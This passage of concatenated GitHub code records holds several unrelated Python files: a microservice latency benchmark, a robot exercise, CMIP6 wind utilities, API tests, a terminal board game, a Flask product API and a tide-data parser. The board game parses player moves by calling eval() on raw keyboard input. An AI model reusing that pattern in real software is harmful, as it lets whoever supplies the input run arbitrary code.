threading\nimport time\nimport matplotlib.pyplot as plt\nimport statistics\nimport os\nimport json\nimport subprocess as sub\nimport numpy as np\nimport io\nmeans=[]\nnames = ['social_graph_mongo_update_client', 'social_graph_redis_update_client', 'follow_server', 'follow_with_username_server', 'user_mmc_get_user_id_client','get_user_id_server','follow_client', 'wrk2_api_user_follow']\ndf = pd.DataFrame()\ndf['Names']=names\nprint(df)\n\ncommand = ['/home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/wrk -D exp -t 1 -c 1 -d 20 -L -s /home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/scripts/social-network/compose-post.lua http://localhost:8080/wrk2-api/post/compose -R 10','/home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/wrk -D exp -t 1 -c 1 -d 20 -L -s /home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/scripts/social-network/compose-post.lua http://localhost:8080/wrk2-api/post/compose -R 10000']\nmean=[0,0]\nwhile(mean[1]>=mean[0]):\n for i in range(0, 2):\n latency=os.popen(command[i]).readlines()\n print(latency[4])\n 
x=latency[4].split()\n print(x)\n e2e=x[1]\n #e2e=e2e.split('u')\n #e2e=e2e.split('m')\n if 'u' in e2e:\n e2e=e2e.split('u')\n mean.append(float(e2e[0]))\n elif 'm' in e2e:\n e2e=e2e.split('m')\n mean.append(float(e2e[0])*1000)\n #mean.append(e2e[0])\n cpuvalues=pd.read_csv('cpuvals.csv')\n print(cpuvalues)\n#print(e2e[0])\n#print(opname)\n print(mean)\n currlargeall = cpuvalues.iloc[0]['CPU%']\n currlargeall=currlargeall.split('%')\n currlargeall=float(currlargeall[0])\n if(mean[1]>=mean[0]):\n print(\"More CPU needs to be allocated. The mean end to end latency is higher with more requests per second.\")\n #increase CPU allocation here of nginx container.\n #the reason that 80% is chosen here is because of prior data collection that shows nginx container using upwards of 74% of CPU.\n #os.popen(\"dzdo docker run socialnetwork_nginx-thrift_1 --cpus=\".8\" ubuntu /bin/bash\")\n else:\n print(\"With higher workload request, the mean latency is less than or equal. Therefore, more CPU does not need to be allocated.\")\n \n\n","repo_name":"ElizabethWeichel/microservices_capstone","sub_path":"403/whileloop.py","file_name":"whileloop.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74603886827","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task\ndef task_5_10():\n left=True\n\n fill_cell()\n while not wall_is_on_the_right():\n move_right()\n fill_cell()\n\n flag1= not wall_is_beneath()\n while flag1:\n move_down()\n fill_cell()\n flag2=True\n while flag2:\n if left:\n move_left()\n fill_cell()\n else:\n move_right()\n fill_cell()\n flag2=not (wall_is_on_the_right() or wall_is_on_the_left())\n left=wall_is_on_the_right()\n flag1 = not wall_is_beneath()\n\n if left:\n while not wall_is_on_the_left():\n move_left()\n\nif __name__ == '__main__':\n run_tasks()\n","repo_name":"DedkovEA/lab_1","sub_path":"task_22.py","file_name":"task_22.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16389458031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated Tue May 17 09:16:05 CEST 2022\n\n@author: Andrea Hahmann, DTU Wind\n\"\"\"\n\nfrom calendar import calendar\nimport cftime\nimport xarray as xr \nfrom datetime import datetime,timedelta\n\ndef datetime_to_cftime(date,calendar='proleptic_gregorian'):\n '''Returns a cftime from a datetime\n\n Args:\n date (string): date in the form yyyymmddhh\n\n Returns:\n cftime: date in cftime \n '''\n\n y,m,d,h = (\n date.dt.year, date.dt.month, date.dt.day, date.dt.hour)\n \n return cftime.datetime(y,m,d,h,\n calendar=calendar)\n\ndef date_to_cftime(date,calendar='noleap'):\n '''Returns a cftime from a yyyymmddhh string\n\n Args:\n date (string): date in the form yyyymmddhh\n\n Returns:\n cftime: date in cftime \n '''\n\n # print(date,len(date))\n if len(date) >= 10:\n y,m,d,h = (\n int(date[0:4]),int(date[4:6]),\\\n int(date[6:8]),int(date[8:10])\n )\n return cftime.datetime(y,m,d,h,calendar=calendar)\n else:\n y,m,d = (\n int(date[0:4]),int(date[4:6]),\\\n int(date[6:8])\n )\n return cftime.datetime(y,m,d,0,calendar=calendar)\n\n \ndef search_esgf(conn,\n field,model,experiment,variant,\n date=None,table='6hrLev',verbose=False):\n\n '''Search dataset in the ESGF database for the field and \n desired year'''\n\n ctx = conn.new_context(\n project='CMIP6',\n source_id=model,\n experiment_id=experiment,\n variable=field,\n 
table_id=table,\n variant_label=variant,\n replica=False) # sometimes, \"latests=True\" works, other times \"replica=False\"\n # latest=True)\n\n if verbose:\n print('Hits: {}, Realms: {}, Ensembles: {}'.format(\n ctx.hit_count,\n ctx.facet_counts['realm'],\n ctx.facet_counts['ensemble']))\n \n if (ctx.hit_count > 0):\n \n result = ctx.search()[0]\n \n files = result.file_context().search()\n\n if (date is None):\n return files[0].opendap_url\n else:\n calendar = date.calendar\n # print(\"Calendar is\",calendar)\n for File in files:\n \n if (table in ['6hrLev','6hrPlevPt','3hr']):\n filename = File.opendap_url.split(\"/\")[-1]\n filedate = filename.split(\"_\")[-1].split(\"-\")[0][0:10]\n start_time = date_to_cftime(filedate,calendar=calendar)\n\n filedate = filename.split(\"_\")[-1].split(\"-\")[1][0:10]\n end_time = date_to_cftime(filedate,calendar=calendar)\n elif (table in ['day']):\n filename = File.opendap_url.split(\"/\")[-1]\n filedate = filename.split(\"_\")[-1].split(\"-\")[0][0:8]\n start_time = date_to_cftime(filedate,calendar=calendar)\n\n filedate = filename.split(\"_\")[-1].split(\"-\")[1][0:8]\n end_time = date_to_cftime(filedate,calendar=calendar)\n\n if (start_time <= date) and (date <= end_time):\n print(\"Date found:\",date, 'in',start_time,end_time) \n return File.opendap_url\n else:\n print(\"No matching files found\")\n\n return\n\ndef combine_hemispheres(var,time=None,lev=None,for_interp=False, \n minlat=20.,maxlat=75.,minlon=330.,maxlon=50.): \n '''Combine array (var) from both hemispheres with continuous\n coordinates.\n In some datasets the vertical coordinate is reversed.'''\n\n min_lat = minlat ; max_lat = maxlat\n min_lon = minlon ; max_lon = maxlon\n\n if (for_interp):\n min_lat = minlat - 5. ; max_lat = maxlat + 5.\n min_lon = minlon - 5. ; max_lon = maxlon + 5.\n\n if time is None and lev is None:\n west = var.sel(lat=slice(min_lat,max_lat),lon=slice(min_lon,360.))\n west['lon'] = west['lon'] - 360.\n east = var.sel(lat=slice(min_lat,max_lat),lon=slice(0.,max_lon))\n west_east = xr.concat([west,east],'lon')\n\n elif lev is None:\n west = var.sel(lat=slice(min_lat,max_lat),lon=slice(min_lon,360.),\n time=time)\n west['lon'] = west['lon'] - 360.\n east = var.sel(lat=slice(min_lat,max_lat),lon=slice(0.,max_lon),\n time=time)\n west_east = xr.concat([west,east],'lon')\n\n else:\n west = var.sel(lat=slice(min_lat,max_lat),lon=slice(min_lon,360.),\n lev=lev,time=time)\n west['lon'] = west['lon'] - 360.\n east = var.sel(lat=slice(min_lat,max_lat),lon=slice(0.,max_lon),\n lev=lev,time=time)\n west_east = xr.concat([west,east],'lon')\n\n return west_east\n\ndef virtual_temperature(t,q):\n '''\n Calculates virtual temperature (K) from temperature (K) and specific humidity (kg/kg)\n '''\n eps = 0.62198\n return t * ((q + eps) / (eps * (1. 
+ q))) \n\ndef air_density(ps,t,q):\n '''\n Calculates air density (kg/m3) from \n pressure (hPa), temperature (K) and specific humidity (kg/kg)\n '''\n Rd = 287.058\n tv = virtual_temperature(t,q)\n return ps / (Rd * tv)\n\ndef make_data_set(du,ws,wd,rho):\n \"\"\"Creates xarray DataArray for netCDF write\n\n Args:\n du (dataset): sample dataset with attributes\n ws (DataArray): wind speed \n wd (DataArray): wind direction\n rho (DataArray): surface air density\n\n Returns:\n xarray DataArray: DataArray for write\n \"\"\"\n lat = xr.DataArray(\n data=ws.lat.values.astype('float32'),\n dims=[\"lat\"],\n coords=dict(\n lat=([\"lat\"], ws.lat.values)\n ),\n attrs=dict(\n long_name=\"latitude\",\n units=\"degrees_north\",\n axis=\"Y\"\n ),\n )\n lon = xr.DataArray(\n data=ws.lon.values.astype('float32'),\n dims=\"lon\",\n coords=dict(\n lon=([\"lon\"], ws.lon.values)\n ),\n attrs=dict(\n long_name=\"longitude\",\n units=\"degrees_east\",\n axis=\"X\"\n ),\n )\n level = xr.DataArray(\n data=ws.level.values.astype('float32'),\n dims=\"level\",\n coords=dict(\n level=([\"level\"], ws.level.values)\n ),\n attrs=dict(\n long_name=\"level\",\n units=\"m\",\n axis=\"Z\"\n ),\n )\n ds = xr.Dataset(\n data_vars=dict(\n wind_speed = (\n [\"time\",\"level\",\"lat\",\"lon\"],ws.values.astype('float32'),\n dict(long_name = \"wind speed\",\n units = \"m s-1\",\n vert_units = \"m\")),\n wind_direction = (\n [\"time\",\"level\",\"lat\",\"lon\"],wd.values.astype('float32'),\n dict(long_name = \"wind direction\",\n units = \"degrees\",\n vert_units = \"m\")),\n air_density = (\n [\"time\",\"lat\",\"lon\"],rho.values.astype('float32'),\n dict(long_name = \"surface air density\",\n units = \"kg m-3\",\n height = \"surface\")),\n ),\n coords=dict(\n lon=lon,\n lat=lat,\n level=level,\n time=ws.time\n ),\n attrs=dict(\n data_source = \"Processed data from CMIP6 runs\",\n experiment = du.experiment_id,\n source = du.source_id,\n variant_label = du.variant_label,\n data_written = datetime.now().strftime(\"%d/%m/%Y %H:%M\")\n )\n ) \n return ds\n","repo_name":"ahahmann/future-wind","sub_path":"future_wind.py","file_name":"future_wind.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"783796947","text":"from uuid import uuid1\n\nimport pytest\nfrom httpx import AsyncClient\n\nfrom lsst.cmservice.config import config\n\n\n@pytest.mark.asyncio()\nasync def test_productions_api(client: AsyncClient) -> None:\n \"\"\"Test `/productions` API endpoint.\"\"\"\n # Create a bunch of fresh productions\n pnames = []\n pids = []\n for n in range(15):\n pnames.append(str(uuid1()))\n response = await client.post(f\"{config.prefix}/productions\", json={\"name\": pnames[n]})\n assert response.status_code == 201\n data = response.json()\n assert data[\"name\"] == pnames[n]\n pids.append(data[\"id\"])\n\n # Create an additional production and delete it to get a \"dead\" id\n pname_dead = str(uuid1())\n response = await client.post(f\"{config.prefix}/productions\", json={\"name\": pname_dead})\n pid_dead = int(response.json()[\"id\"])\n response = await client.delete(f\"{config.prefix}/productions/{pid_dead}\")\n assert response.status_code == 204\n\n # Get list; verify first batch all there and dead one missing\n response = await client.get(f\"{config.prefix}/productions\")\n assert response.status_code == 200\n data = response.json()\n assert isinstance(data, list)\n pids_expected = set(pids)\n pids_retrieved = {production[\"id\"] 
for production in data}\n assert pids_expected <= pids_retrieved\n assert pid_dead not in pids_retrieved\n\n # Verify an individual get\n response = await client.get(f\"{config.prefix}/productions/{pids[0]}\")\n assert response.status_code == 200\n data = response.json()\n assert data[\"id\"] == pids[0]\n assert data[\"name\"] == pnames[0]\n\n # Try to get one that shouldn't be there\n response = await client.get(f\"{config.prefix}/productions/{pid_dead}\")\n assert response.status_code == 404\n\n # Verify repeated delete\n response = await client.delete(f\"{config.prefix}/productions/{pid_dead}\")\n assert response.status_code == 204\n\n # Try update with mismatched IDs\n response = await client.put(\n f\"{config.prefix}/productions/{pid_dead}\",\n json={\"id\": pids[0], \"name\": pname_dead},\n )\n assert response.status_code == 400\n\n # Try update of something not there\n response = await client.put(\n f\"{config.prefix}/productions/{pid_dead}\",\n json={\"id\": pid_dead, \"name\": pname_dead},\n )\n assert response.status_code == 404\n\n # Try to create a name conflict\n response = await client.post(f\"{config.prefix}/productions\", json={\"name\": pnames[0]})\n assert response.status_code == 422\n\n # Try to update to a name conflict\n response = await client.put(\n f\"{config.prefix}/productions/{pids[0]}\",\n json={\"id\": pids[0], \"name\": pnames[1]},\n )\n assert response.status_code == 422\n\n # Try a valid update and verify results\n pname_updated = str(uuid1())\n response = await client.put(\n f\"{config.prefix}/productions/{pids[0]}\",\n json={\"id\": pids[0], \"name\": pname_updated},\n )\n assert response.status_code == 200\n data = response.json()\n assert data[\"id\"] == pids[0]\n assert data[\"name\"] == pname_updated\n\n # Also check update results via individual get\n response = await client.get(f\"{config.prefix}/productions/{pids[0]}\")\n data = response.json()\n assert data[\"id\"] == pids[0]\n assert data[\"name\"] == pname_updated\n\n # Pagination check: loop retrieving pages and checking as we go\n skip = 0\n stride = 6\n pids_retrieved = set()\n results = await client.get(f\"{config.prefix}/productions?skip={skip}&limit={stride}\")\n assert results.status_code == 200\n data = results.json()\n while len(data) != 0:\n pids_batch = {production[\"id\"] for production in data}\n assert pids_batch.isdisjoint(pids_retrieved)\n pids_retrieved |= pids_batch\n skip += stride\n results = await client.get(f\"{config.prefix}/productions?skip={skip}&limit={stride}\")\n assert results.status_code == 200\n data = results.json()\n\n # Check we got everything expected, and none of the things we expected not\n # to get\n assert pids_expected <= pids_retrieved\n assert pid_dead not in pids_retrieved\n","repo_name":"lsst-dm/cm-service","sub_path":"tests/routers/test_productions.py","file_name":"test_productions.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24242482567","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom enum import Enum\nimport colored\nfrom colored import stylize\n\nimport threading\nimport time\nimport random\n\n##############################################################################\n# Game grid setup\nimax = 4\njmax = 4\ngrid = []\nfor i in range(0,imax):\n grid.append([])\n for j in range(0,jmax):\n grid[i].append(' ')\n\n# Coloring setup\ngridStyle = colored.attr(\"bold\") + colored.fg(\"white\")\npawnStyle 
= [[colored.bg(\"blue\") + colored.fg(\"white\")],\n [colored.bg(\"red\") + colored.fg(\"white\")]]\npathStyle = colored.bg(\"green\") + colored.fg(\"white\")\ndrawStyle = colored.attr(\"bold\") + colored.fg(\"white\")\n\n###############################################################################\ndef gridIsFull():\n global grid,imax,jmax\n for i in range(0,imax):\n for j in range(0,jmax):\n if grid[i][j]==' ':\n return False\n return True\n\n###############################################################################\ndef isInGrid(i, j):\n global grid, imax, jmax\n return 0 <= i < imax and 0 <= j < jmax\n\n###############################################################################\ndef drawLine(style):\n global grid, jmax, gridStyle\n\n print(stylize(f\"\\u2014\", style), end = '')\n for j in range(0, jmax):\n print(stylize(f\"\\u2014\\u2014\\u2014\\u2014\", style), end = '')\n print()\n\n\ndef printGrid(stolen = [], path = []):\n global grid, imax, jmax, gridStyle, pawns, pawnStyle\n\n print()\n drawLine(gridStyle)\n\n for i in range(0, imax):\n for j in range(0, jmax):\n # print(stylize(\"| \", gridStyle), end = '')\n print(stylize(\"|\", gridStyle), end = '')\n\n if [i,j] in path:\n print(stylize(f\" {grid[i][j]} \", pathStyle), end = '')\n else:\n if grid[i][j] == ' ':\n print(\" \", end = '')\n else:\n if [i,j] in stolen:\n print(stylize(stylize(f\" {grid[i][j]} \",\n pawnStyle[pawns.index(grid[i][j])]),\n colored.attr(\"blink\")), end = '')\n else:\n print(stylize(f\" {grid[i][j]} \", pawnStyle[pawns.index(grid[i][j])]),\n end = '')\n print(stylize(f\"|\", gridStyle))\n\n drawLine(gridStyle)\n\ndef printCell(i, j):\n return \"[\" + str(i) + \", \" + str(j) + \"]\"\n\n###############################################################################\ndef announceWinner(path):\n global grid, imax, jmax, gridStyle, pawns, pawnStyle\n\n pawn = grid[path[0][0]][path[0][1]]\n print()\n print(stylize(f\"{pawn} is the winner with a score of {len(path)}!\",\n pawnStyle[pawns.index(pawn)]), end = '')\n\n # print(stylize(f\"Winning path: {path}\",\n # xStyle if grid[path[0][0]][path[0][1]] == 'X' else oStyle))\n\n printGrid([], path)\n\ndef announceDraw(longestPath, allPaths):\n global grid, imax, jmax, drawStyle, pawns\n\n print()\n print(stylize(f\"The game ended in a draw with a score of {len(longestPath)}!\",\n drawStyle))\n\n allLPCells = []\n for i in range(0, len(pawns)):\n if len(longestPath) == len(allPaths[i]):\n allLPCells += allPaths[i]\n printGrid([], allLPCells)\n\n###############################################################################\ndef stealPawns(i, j, pName):\n global grid, imax, jmax, pawns, pawnStyle, stolen\n pawn = grid[i][j]\n stolen = []\n\n # Check the 4 pawns opposite to the one just added at (i,j),\n # and steal the pawns in between if the symbols match\n if i < imax - 2 and grid[i + 2][j] == pawn and grid[i + 1][j] != ' ' and grid[i + 1][j] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i + 1][j]} at [{i + 1},{j}] !\",pawnStyle[pawns.index(grid[i + 1][j])]))\n grid[i + 1][j] = pawn\n stolen.append([i + 1, j])\n\n if i > 1 and grid[i - 2][j] == pawn and grid[i - 1][j] != ' ' and grid[i - 1][j] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i - 1][j]} at [{i - 1},{j}] !\",\n pawnStyle[pawns.index(grid[i - 1][j])]))\n grid[i - 1][j] = pawn\n stolen.append([i - 1, j])\n\n if j < jmax - 2 and grid[i][j + 2] == pawn and grid[i][j + 1] != ' ' and grid[i][j + 1] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i][j + 1]} at 
[{i},{j + 1}] !\",\n pawnStyle[pawns.index(grid[i][j + 1])]))\n grid[i][j + 1] = pawn\n stolen.append([i, j + 1])\n\n\n if j > 1 and grid[i][j - 2] == pawn and grid[i][j - 1] != ' ' and grid[i][j - 1] != pawn:\n print(stylize(f\"{pName} has stolen pawn {grid[i][j - 1]} at [{i},{j - 1}] !\",\n pawnStyle[pawns.index(grid[i][j - 1])]))\n grid[i][j - 1] = pawn\n stolen.append([i, j - 1])\n\n return stolen\n###############################################################################\ndef randomGridInitialization():\n global grid, imax, jmax\n for i in range(0, imax):\n for j in range(0, jmax):\n if bool(random.getrandbits(1)) == True:\n grid[i][j] = 'O'\n else:\n grid[i][j] = 'X'\n\n###############################################################################\ndef boardArrayIndex(i, j):\n global grid, imax, jmax, nbPlayers, pawns\n startIdx = -1 # Index of board section dedicated to the symbol\n if grid[i][j] == ' ':\n startIdx = nbPlayers * imax * jmax\n else:\n startIdx = pawns.index(grid[i][j]) * imax * jmax\n return startIdx + jmax * i + j\n\ndef encodeBoard():\n global grid, imax, jmax, nbPlayers\n boardArray = [0] * (imax * jmax * (nbPlayers + 1))\n\n emptyIdx = nbPlayers * (imax * jmax)\n for i in range(0, imax):\n for j in range(0, jmax):\n boardArray[boardArrayIndex(i,j)] = 1\n\n print(boardArray)\n\n return boardArray\n\n\n###############################################################################\ndef left(i, j):\n return [i - 1, j]\n\ndef right(i, j):\n return [i + 1, j]\n\ndef top(i, j):\n return [i, j + 1]\n\ndef bottom(i, j):\n return [i, j - 1]\n\ndef resolveWinner():\n global grid,imax,jmax, pawns,pawnStyle\n # Resolve winner - DFS-style, considering all paths\n longestPath = []\n allPaths = [] # All longest paths, indexed by pawn\n for pn in pawns:\n allPaths.append([])\n\n for i in range(0, imax):\n for j in range(0, jmax):\n pawn = grid[i][j]\n\n # print(f\"Exploring grid from {printCell(i, j)}: {pawn}\")\n\n pathCandidate = explorePaths(i, j, pawn, [])\n # print(f\"pathCandidate: {pathCandidate} - l: {len(pathCandidate)}\")\n\n if len(pathCandidate) > len(longestPath):\n longestPath = pathCandidate\n\n if len(pathCandidate) > len(allPaths[pawns.index(pawn)]):\n allPaths[pawns.index(pawn)] = pathCandidate\n\n # print(f\"longestPath: {longestPath} - l: {len(longestPath)}\")\n # print(f\"{grid[longestPath[0][0]][longestPath[0][1]]} is the winner\")\n\n lpCount = 0\n for i in range(0, len(pawns)):\n if len(allPaths[i]) == len(longestPath):\n lpCount += 1\n\n return (lpCount != 1), longestPath, allPaths\n\ndef explorePaths(i, j, pawn, path): # returns longestPath\n path += [[i,j]]\n paths = []\n longestPath = path\n\n # print(path)\n # tmp = input(\"continue?\")\n\n for p in [left(i,j), right(i,j), top(i,j), bottom(i,j)]:\n if isInGrid(p[0], p[1]) \\\n and grid[p[0]][p[1]] == pawn \\\n and not p in path:\n # print (f\"Moving to [{p[0]},{p[1]}]\")\n pathCandidate = explorePaths(p[0], p[1], pawn, path[:])\n if len(pathCandidate) > len(longestPath):\n longestPath = pathCandidate\n\n return longestPath\n\n\n###############################################################################\nclass Player(threading.Thread):\n\n def __init__(self, name, num, pawn, playerType):\n threading.Thread.__init__(self)\n self.setName(name) # Player name (e.g., 'Player 1')\n self.num = num # player id (e.g., 1 for Player 1)\n self.pawn = pawn # Type of pawn assigned to the player\n self.playerType = playerType # player type: 0 = computer, 1 = human\n self.stop = False # Flag used to stop 
the thread when requested by the main loop\n\n def run(self):\n # Grant access to global variables\n global mutex # lock on concurrent access to global variables\n global readyToPlay # Flag granted authorization to play to the players\n global moveCounter # move counter\n global first # id of the player playing first\n global nbjoueurs # total number of players\n # global aide # says whether a help display has been requested\n\n while not self.stop: # While thread has not been stopped by game loop\n\n ##### => each player awaits its turn\n while True: # Player wait loop\n # acquire lock on global variables\n mutex.acquire()\n if self.stop:\n # Game over, leave player wait loop but keeping the acquired lock\n break\n if readyToPlay and (moveCounter+first)%nbPlayers == self.num:\n # = it is this player's turn to play, keep lock and leave loop\n break\n # otherwise, release lock and let other players check for their turn\n mutex.release()\n\n ##### => Current player's turn\n\n if not self.stop:\n if self.pawn == 'X':\n otherPawn = 'O'\n else:\n otherPawn = 'X'\n print()\n print(self.getName() + \" plays ('\" + self.pawn + \"' against '\" + otherPawn + \"')\")\n\n if self.playerType == PlayerType.COMPUTER.value: # playerTypes stores plain ints, so compare against the enum value\n # Player is a computer\n\n # self.chx = ajouer(self.pion)\n # print self.getName() + \" joue case: \",self.chx\n # grille[self.chx[0]][self.chx[1]]=self.pion\n time.sleep(0.1)\n else:\n # Player is a human\n # self.chx = ajouer(self.pion)\n ch=self.getName() + \" plays cell (e.g., '[1,2]'): \"\n while True:\n self.move = input(ch)\n try:\n # player has entered a line, column couple\n x = eval(self.move)\n if ((type(x) == list or type(x) == tuple) and len(x) == 2) \\\n and (0 < x[0] <= imax) and (0 < x[1] <= jmax) \\\n and grid[x[0] - 1][x[1] - 1] == ' ':\n grid[x[0] - 1][x[1] - 1] = self.pawn\n # Perform stealing checks and update grid\n stolen = stealPawns(x[0] - 1, x[1] - 1, self.getName())\n break\n else:\n raise Exception()\n except:\n # the entered choice is not valid here\n print(\"--> incorrect move. FORMAT: 'line, col' or '[line, col]' (i,j) \\in [1..4]\")\n pass\n\n ##### => end of player turn\n\n # execution is yielded back to game loop\n readyToPlay = False\n\n # Release mutex on global variables\n mutex.release()\n\n # If termination has been requested, terminate\n if self.stop:\n break\n\n def terminate(self):\n self.stop = True\n\n###############################################################################\nnbPlayers = 2\ntestMode = False\npawns = ['O','X']\n\nclass PlayerType(Enum):\n COMPUTER = 0 # no trailing comma here, otherwise the value would be the tuple (0,)\n HUMAN = 1\n\n# Player types: 0=computer, 1=human; there must be: len(playerTypes) == nbPlayers\nwhile True:\n print()\n print (u\"Game type:\")\n print (u\"[1]: 2 humans play together\")\n print (u\"[2]: 1 computer plays against 1 human player\")\n print (u\"[3]: the computer plays against itself\")\n print (u\"[4]: generates a random grid\")\n x = input(\"What type of game do you wish to play? 
[1 by default]: \")\n if x == '1' or x == '':\n playerTypes = [1,1]\n break\n\n if x == '2':\n playerTypes = [0,1]\n print('Games with computer are not supported yet.')\n exit()\n\n if x == '3':\n playerTypes = [0,0]\n print('Games with computer are not supported yet.')\n exit()\n\n if x == '4':\n testMode = True\n break\n\nif testMode:\n randomGridInitialization()\n printGrid()\n draw, longestPath, allPaths = resolveWinner()\n if draw:\n announceDraw(longestPath, allPaths)\n else:\n announceWinner(longestPath)\n\n encodeBoard()\n\n exit()\n\n\n# Assign a pawn type to each player\nprint()\nprint (u\"=====> player 1 has the 'O' pawn, the other the 'X' pawn\")\n\n\n# define the player who will play the first move, or choose randomly\nwhile True:\n print()\n print (u\"Who should play the first move?\")\n print (u\"[1] player 1 starts\")\n print (u\"[2] player 2 starts\")\n print (u\"[3] choose randomly\")\n x = input(u\"Choose an option [3 by default]: \")\n if x == '1':\n first = 0\n break\n elif x == '2':\n first = 1\n break\n elif x == '3' or x == '':\n first = random.randint(0, nbPlayers - 1)\n break\n\nprint()\nprint (\"=====> Player \" + str(first+1) + \" plays first\")\n\n############################## => program initialization\n\n# mutex on global variables below\nmutex = threading.Lock()\n\n# Counts the number of moves played by all players,\nmoveCounter = -1\n\n# Flag used to yield back the execution to the main program after a move is played\nreadyToPlay = False\n\n# List of stolen cells at the current turn\nstolen = []\n\n# Creation of the list of players\nplayers = []\nfor i in range(0,nbPlayers):\n p = Player(\"Player %d\" % (i+1), i, pawns[i], playerTypes[i])\n p.setDaemon(True)\n players.append(p)\n\n# start all the player threads\nfor i in range(0, nbPlayers):\n players[i].start()\n\n# ##############################\n# # Game loop\n\nt = time.time()\nwhile True:\n # waiting for a player to play its turn\n while True:\n mutex.acquire()\n if not readyToPlay:\n moveCounter +=1 # increment move counter for the move that has just been played\n break\n mutex.release()\n\n # print the updated game grid\n printGrid(stolen)\n\n # end of game condition\n if gridIsFull():\n draw, longestPath, allPaths = resolveWinner()\n if draw:\n announceDraw(longestPath, allPaths)\n else:\n announceWinner(longestPath)\n mutex.release()\n break\n\n # New round detection\n roundNum = round((moveCounter / nbPlayers) + 1)\n nextPlayer = moveCounter % nbPlayers\n # if nextPlayer == 0:\n # print\n # print (u\"=====> Starting round #\" + str(roundNum))\n\n # Allow the next player to play its turn\n readyToPlay = True\n mutex.release()\n # loop until the next player has made his move\n\n#############################\n# Game end\n# print\n# print (\"Game over!\")\n\n# stop all threads\nfor i in range(0, nbPlayers):\n players[i].terminate()\n\n# Wait until all threads are terminated\nfor i in range(0, nbPlayers):\n players[i].join()\n mutex.acquire()\n #print (\"end of thread \" + players[i].getName())\n mutex.release()\n\n\nprint()\n#print (u\"Come back soon for another game of Ginerion!\")\n","repo_name":"pthalamy/Ginerion","sub_path":"ginerion.py","file_name":"ginerion.py","file_ext":"py","file_size_in_byte":15801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"40540555035","text":"# wsgi.py\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nimport json\napp = Flask(__name__)\n\nthe_products = [\n { 'id': 1, 'name': 
'Skello' },\n { 'id': 2, 'name': 'Socialive.tv' },\n { 'id': 3, 'name': 'Scality' },\n { 'id': 4, 'name': 'Actifio' },\n { 'id': 5, 'name': 'Google' },\n ]\n\n@app.route('/')\ndef hello():\n return \"Hello World!\"\n\n@app.route('/api/v1/products')\ndef products():\n return jsonify(the_products)\n\n@app.route('/api/v1/products/<int:id>', methods=['GET'])\ndef get_product(id):\n for product in the_products:\n if product['id'] == int(id):\n return jsonify(product)\n return jsonify({'error' : 'Product not found'}), 404\n\n@app.route('/api/v1/products/<int:id>', methods=['DELETE'])\ndef del_product(id):\n for product in the_products:\n if product['id'] == id:\n del the_products[the_products.index(product)]\n return '', 204\n return jsonify({'error' : 'Product not found'}), 404\n\n@app.route('/api/v1/products', methods=['POST'])\ndef add_product():\n try:\n payload = json.loads(request.data)\n except ValueError:\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n if 'name' not in payload:\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n max_id = 0\n for product in the_products:\n if max_id < product['id']:\n max_id = product['id']\n if product['name'] == payload['name']:\n return jsonify({\"error\" : \"Product already exists\"}), 422\n the_products.append({ 'id': max_id+1, 'name': payload['name'] })\n return jsonify({ 'id': max_id+1, 'name': payload['name'] }), 201\n\n@app.route('/api/v1/products/<int:id>', methods=['PATCH'])\ndef change_product(id):\n try:\n payload = json.loads(request.data)\n except ValueError:\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n if 'name' not in payload:\n return jsonify({\"error\" : \"Bad payload received\"}), 422\n for product in the_products:\n if product['id'] == id:\n product['name'] = payload['name']\n return '', 204\n return jsonify({'error' : 'Product not found'}), 404\n","repo_name":"Coballt/flask-101","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"38709187058","text":"from kartverket_tide_api.parsers import AbstractResponseParser\nfrom kartverket_tide_api.exceptions import CannotFindElementException, NoTideDataErrorException\nfrom kartverket_tide_api.tideobjects import WaterLevel\n\n\nclass LocationDataParser(AbstractResponseParser):\n def _parsing_logic(self) -> {}:\n \"\"\"Parse the response of a location data request. 
Returns a dictionary containing a list of water levels\n\n :exception CannotFindElementException: cannot find some expected element in the xml\n :exception NoTideDataErrorException: the xml has no tide data\n\n :return dict containing a list of WaterLevel objects\n \"\"\"\n location_data = self.root.find('locationdata')\n if location_data is None:\n raise CannotFindElementException('Cannot find location_data element')\n nodata = location_data.find('nodata')\n\n if nodata is not None:\n raise NoTideDataErrorException('This location has no tide data')\n data = location_data.find('data')\n\n if data is None:\n raise CannotFindElementException('Cannot find data element')\n\n data_type = data.attrib['type']\n water_levels = []\n for water_level in data.iter('waterlevel'):\n attribs = water_level.attrib\n if attribs['flag'] == 'high' or attribs['flag'] == 'low':\n water_levels.append(WaterLevel(attribs['value'],\n attribs['time'],\n data_type,\n attribs['flag'] == 'high'))\n else:\n water_levels.append(WaterLevel(attribs['value'],\n attribs['time'],\n data_type))\n\n return {'data': 